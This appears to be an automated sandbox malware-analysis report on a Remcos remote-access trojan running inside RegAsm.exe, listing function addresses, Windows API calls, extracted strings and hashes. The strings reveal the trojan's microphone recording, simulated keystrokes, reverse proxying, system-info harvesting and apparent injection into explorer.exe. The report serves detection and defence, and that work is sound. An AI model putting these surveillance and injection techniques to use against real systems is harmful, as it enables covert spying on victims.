                                                  Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 004481B5
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 004481C1
                                                  • _free.LIBCMT ref: 004481CC
                                                  • _free.LIBCMT ref: 004481D7
                                                  • _free.LIBCMT ref: 004481E2
                                                  • _free.LIBCMT ref: 004481ED
                                                  • _free.LIBCMT ref: 004481F8
                                                  • _free.LIBCMT ref: 00448203
                                                  • _free.LIBCMT ref: 0044820E
                                                  • _free.LIBCMT ref: 0044821C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                  • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                  • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                  • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                  Function 00411530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Eventinet_ntoa
                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                  • API String ID: 3578746661-3604713145
                                                  • Opcode ID: 78c095f4105be351b2648146640295a9135c2fc0987ccdb541504fc44edccf3b
                                                  • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                  • Opcode Fuzzy Hash: 78c095f4105be351b2648146640295a9135c2fc0987ccdb541504fc44edccf3b
                                                  • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                  Function 00455F84 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DecodePointer
                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                  • API String ID: 3527080286-3064271455
                                                  • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                  • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                  • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                  • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                  Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                  • Sleep.KERNEL32(00000064), ref: 0041755C
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                  • API String ID: 1462127192-2001430897
                                                  • Opcode ID: 0ade83845347d8525ce03316b53d9e05314995dc97b2a36bef330d1317d5e8b7
                                                  • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                  • Opcode Fuzzy Hash: 0ade83845347d8525ce03316b53d9e05314995dc97b2a36bef330d1317d5e8b7
                                                  • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                  Function 004073E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentProcess
                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                  • API String ID: 2050909247-4242073005
                                                  • Opcode ID: 7d06a24fb93ff6ee8fc7d1de39de95acdb2dde4c17e3bed0e21b448150c76676
                                                  • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                  • Opcode Fuzzy Hash: 7d06a24fb93ff6ee8fc7d1de39de95acdb2dde4c17e3bed0e21b448150c76676
                                                  • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                  Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _strftime.LIBCMT ref: 00401D50
                                                    • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                  • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                  • API String ID: 3809562944-243156785
                                                  • Opcode ID: 631b70e71605f283cfdfcec03d03cf742693868e286b15c17712ccdca5938df0
                                                  • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                  • Opcode Fuzzy Hash: 631b70e71605f283cfdfcec03d03cf742693868e286b15c17712ccdca5938df0
                                                  • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                  Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                  • int.LIBCPMT ref: 00410EBC
                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                  • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                  • String ID: ,kG$0kG
                                                  • API String ID: 3815856325-2015055088
                                                  • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                  • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                  • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                  • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                  Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                  • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                  • waveInStart.WINMM ref: 00401CFE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                  • String ID: dMG$|MG$PG
                                                  • API String ID: 1356121797-532278878
                                                  • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                  • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                  • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                  • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                  Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                    • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                    • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                    • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                  • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                  • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                  • TranslateMessage.USER32(?), ref: 0041D57A
                                                  • DispatchMessageA.USER32(?), ref: 0041D584
                                                  • GetMessageA.USER32 ref: 0041D591
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                  • String ID: Remcos
                                                  • API String ID: 1970332568-165870891
                                                  • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                  • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                  • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                  • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                  Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                  • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                  • Opcode Fuzzy Hash: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                  • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                  Function 00453E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                  • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                  • __alloca_probe_16.LIBCMT ref: 00454014
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                  • __freea.LIBCMT ref: 00454083
                                                  • __freea.LIBCMT ref: 0045408F
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                  • String ID:
                                                  • API String ID: 201697637-0
                                                  • Opcode ID: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                  • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                  • Opcode Fuzzy Hash: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                  • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                  Function 004451FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                  • _free.LIBCMT ref: 00445515
                                                  • _free.LIBCMT ref: 0044552E
                                                  • _free.LIBCMT ref: 00445560
                                                  • _free.LIBCMT ref: 00445569
                                                  • _free.LIBCMT ref: 00445575
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                  • String ID: C
                                                  • API String ID: 1679612858-1037565863
                                                  • Opcode ID: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                  • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                  • Opcode Fuzzy Hash: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                  • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                  Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tcp$udp
                                                  • API String ID: 0-3725065008
                                                  • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                  • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                  • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                  • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                  Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 004018BE
                                                  • ExitThread.KERNEL32 ref: 004018F6
                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                  • String ID: PkG$XMG$NG$NG
                                                  • API String ID: 1649129571-3151166067
                                                  • Opcode ID: de5d16925772a287ebcfb4afa4ce91567f336408c558c247237889d51a2cceb0
                                                  • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                  • Opcode Fuzzy Hash: de5d16925772a287ebcfb4afa4ce91567f336408c558c247237889d51a2cceb0
                                                  • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                  Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                  • MoveFileW.KERNEL32 ref: 00407AA5
                                                  • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                    • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                  • String ID: .part
                                                  • API String ID: 1303771098-3499674018
                                                  • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                  • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                  • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                  • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                  Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendInput.USER32 ref: 00419A25
                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                    • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InputSend$Virtual
                                                  • String ID:
                                                  • API String ID: 1167301434-0
                                                  • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                  • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                  • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                  • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                  Function 004475F1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __freea$__alloca_probe_16_free
                                                  • String ID: a/p$am/pm$h{D
                                                  • API String ID: 2936374016-2303565833
                                                  • Opcode ID: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                  • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                  • Opcode Fuzzy Hash: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                                  • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                  Function 00444D7C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • _free.LIBCMT ref: 00444E87
                                                  • _free.LIBCMT ref: 00444E9E
                                                  • _free.LIBCMT ref: 00444EBD
                                                  • _free.LIBCMT ref: 00444ED8
                                                  • _free.LIBCMT ref: 00444EEF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID: KED
                                                  • API String ID: 3033488037-2133951994
                                                  • Opcode ID: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                  • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                  • Opcode Fuzzy Hash: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                                  • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                  Function 00413A90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Enum$InfoQueryValue
                                                  • String ID: [regsplt]$xUG$TG
                                                  • API String ID: 3554306468-1165877943
                                                  • Opcode ID: 9697bb9c8a57706a51b28894dccdef54b3feb513602de5161671525287b676f0
                                                  • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                  • Opcode Fuzzy Hash: 9697bb9c8a57706a51b28894dccdef54b3feb513602de5161671525287b676f0
                                                  • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                  Function 0044B43C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                  • __fassign.LIBCMT ref: 0044B4F9
                                                  • __fassign.LIBCMT ref: 0044B514
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                  • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                  • String ID:
                                                  • API String ID: 1324828854-0
